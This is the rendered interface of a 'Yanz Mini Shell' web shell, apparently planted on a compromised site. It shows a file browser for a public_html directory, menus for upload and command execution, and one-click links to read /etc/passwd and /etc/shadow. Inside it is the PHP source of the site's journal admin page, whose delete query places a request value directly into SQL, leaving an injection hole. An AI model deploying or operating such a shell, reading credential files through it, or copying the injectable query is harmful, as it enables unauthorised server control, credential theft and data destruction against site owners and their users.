Yanz Mini Shell
[_]
[-]
[X]
[
HomeShell 1
] [
HomeShell 2
] [
Upload
] [
Command Shell
] [
Scripting
] [
About
]
[ Directory ] =>
/
home
naacpd
public_html
Action
[*]
New File
[*]
New Folder
Sensitive File
[*]
/etc/passwd
[*]
/etc/shadow
[*]
/etc/resolv.conf
[
Delete
] [
Edit
] [
Rename
] [
Back
]
<?php if($Action=="Delete") { $delete_modify = $pdo->query("Delete From journal_page_content Where id_no='$id_no'"); if(isset($delete_modify)) { echo "<script>window.open('?menu=$menu&page_title=$page_title','_self')</script>"; } } ?> <section class="content"> <div class="row"> <div class="col-sm-12"> <div class="box box-primary"> <div class="box-header with-border"> <h3 class="box-title"><?php if(!empty($main_menu)){ echo $main_menu;echo " <i class='fa fa-angle-right' style='font-weight:bold;'></i> ";} ?> <?php echo $menu; ?></h3> <div class="box-tools pull-right"> <a href="?menu=Add New Info&page_title=add_new_journal_info&main_menu=<?php echo $menu; ?>" class="btn btn-warning"> <i class="fa fa-plus"></i> Add New </a> </div> </div> <div class="box-body"> <div class="table-responsive view-table"> <table class="table " id="example"> <thead> <tr> <th>SL</th> <th>Title</th> <th>Action</th> </tr> </thead> <tbody aria-relevant="all" aria-live="polite" role="alert"> <?php $information = $pdo->query("SELECT * FROM journal_page_content ORDER BY id_no ASC"); $i=1; while ($rowdata = $information->fetch()) { $total=$i++; ?> <tr> <td text align="center"><?php echo $total; ?></td> <td><a href="?menu=Journal Info Details&page_title=journal_info_details&id_no=<?php echo $rowdata["id_no"]; ?>&main_menu=<?php echo $menu; ?>"><?php echo $rowdata["title"]; ?></a></td> <td text align="center"> <a title="Edit Info" href="?menu=Update Journal Info&page_title=update_journal_page_content&id_no=<?php echo $rowdata["id_no"]; ?>&main_menu=<?php echo $menu; ?>" onClick="return confirm('Do You Want To Edit Information?')"><i class="fa fa-edit" style="font-size:18px"></i></a> <a title="Delete Information" href="?menu=<?php echo $menu; ?>&page_title=<?php echo $page_title; ?>&main_menu=<?php echo $main_menu; ?>&id_no=<?php echo $rowdata["id_no"]; ?>&Action=Delete" onClick="return confirm('Do You Want To Delete Information?')"><i class="fa fa-trash" style="font-size:18px"></i></a> </td> </tr> <?php } ?> </tbody> </table> </div> </div> </div> </div> </div> </section> <style> th{ text-align:center; } .table-responsive{ overflow-x: hidden; } </style>
Free Space : 464405864448 Byte